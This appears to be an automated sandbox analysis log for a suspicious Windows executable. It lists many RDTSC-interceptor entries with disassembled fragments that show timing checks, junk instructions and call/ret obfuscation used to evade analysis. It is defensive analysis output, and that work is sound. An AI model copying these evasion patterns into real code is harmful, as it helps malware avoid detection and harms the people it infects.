Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E6FE9 second address: 8D1664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5F64D1DF16h 0x00000009 jns 00007F5F64D1DF16h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F5F64D1DF21h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F5F64D1DF18h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 sbb di, 19B5h 0x00000038 call dword ptr [ebp+12450DF6h] 0x0000003e push edi 0x0000003f pushad 0x00000040 jmp 00007F5F64D1DF27h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7196 second address: 8E719B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E719B second address: 8E71B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E770A second address: 8E7725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DAC0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7725 second address: 8E776E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5F64D1DF2Eh 0x0000000c jmp 00007F5F64D1DF28h 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 jmp 00007F5F64D1DF1Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5F64D1DF20h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E776E second address: 8E7772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7772 second address: 8E7796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ebx 0x0000000a push eax 0x0000000b jnp 00007F5F64D1DF16h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push esi 0x00000019 jne 00007F5F64D1DF16h 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7796 second address: 8E779A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E78D8 second address: 8E78DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79F1 second address: 8E79FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E79FB second address: 8E7A12 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A12 second address: 8E7A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A18 second address: 8E7A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A1D second address: 8E7A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A23 second address: 8E7A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A27 second address: 8E7A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7A2B second address: 8E7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jc 00007F5F64D1DF1Eh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C45 second address: 8E7C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7C4B second address: 8E7C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8079 second address: 8E8084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8084 second address: 8E808D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E838C second address: 8E8392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8392 second address: 8E8396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8396 second address: 8E83AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F5F64D1DAB8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E83AC second address: 8E83C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E84C4 second address: 8E8519 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F5F64D1DAB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 xor dword ptr [ebp+122D31BBh], esi 0x0000002e add ecx, dword ptr [ebp+122D2AB7h] 0x00000034 lea eax, dword ptr [ebp+1247BD74h] 0x0000003a or dl, FFFFFFCAh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jng 00007F5F64D1DAB6h 0x00000047 jnp 00007F5F64D1DAB6h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8519 second address: 8E856D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F5F64D1DF16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2A4Fh] 0x00000015 jng 00007F5F64D1DF1Bh 0x0000001b lea eax, dword ptr [ebp+1247BD30h] 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F5F64D1DF18h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b nop 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F5F64D1DF16h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E856D second address: 8E8587 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jo 00007F5F64D1DAC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jns 00007F5F64D1DAB6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E8587 second address: 8E858B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F357 second address: 91F35B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F35B second address: 91F37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5F64D1DF1Bh 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F5F64D1DF16h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5F7 second address: 91F5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F5FB second address: 91F610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F610 second address: 91F64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5F64D1DAD3h 0x0000000c jmp 00007F5F64D1DABEh 0x00000011 jmp 00007F5F64D1DABFh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F64D second address: 91F651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F651 second address: 91F680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 jmp 00007F5F64D1DAC4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91F680 second address: 91F69A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA59 second address: 91FA83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5F64D1DABAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FA83 second address: 91FA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC0F second address: 91FC24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DABEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC24 second address: 91FC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F5F64D1DF16h 0x0000000d jmp 00007F5F64D1DF1Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 91FC3F second address: 91FC43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924592 second address: 924596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924596 second address: 92459A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92459A second address: 9245A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246D4 second address: 9246E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E0 second address: 9246E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246E4 second address: 9246F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9246F4 second address: 924717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5F64D1DF16h 0x0000000a js 00007F5F64D1DF16h 0x00000010 popad 0x00000011 jmp 00007F5F64D1DF1Fh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924717 second address: 92471D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92471D second address: 924723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B77 second address: 924B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924B84 second address: 924BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF28h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924BA1 second address: 924BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 924FC3 second address: 924FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BD41 second address: 92BD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5F64D1DABCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70A second address: 8AB70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB70E second address: 8AB712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB712 second address: 8AB73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c jmp 00007F5F64D1DF1Ch 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB73E second address: 8AB74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8AB74A second address: 8AB75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F5F64D1DF16h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A972 second address: 92A978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A978 second address: 92A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92A97C second address: 92A986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92AAF0 second address: 92AAF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B1D6 second address: 92B1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B357 second address: 92B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F5F64D1DF1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92B365 second address: 92B385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5F64D1DABEh 0x0000000b jnl 00007F5F64D1DABCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92BBB3 second address: 92BBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e jng 00007F5F64D1DF16h 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F358 second address: 92F369 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F369 second address: 92F371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 92F371 second address: 92F38D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C80D second address: 89C81E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C81E second address: 89C823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C823 second address: 89C829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 89C829 second address: 89C833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932271 second address: 932278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 932278 second address: 93229B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a pop eax 0x0000000b jne 00007F5F64D1DAC2h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93229B second address: 9322A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322A2 second address: 9322C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DAC3h 0x00000008 jnl 00007F5F64D1DAB6h 0x0000000e jc 00007F5F64D1DAB6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9322C9 second address: 9322DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9339FD second address: 933A18 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAC6h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 933A18 second address: 933A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jc 00007F5F64D1DF45h 0x0000000d js 00007F5F64D1DF22h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CEA second address: 935CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 935CF0 second address: 935CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA12 second address: 93AA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AA1D second address: 93AA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
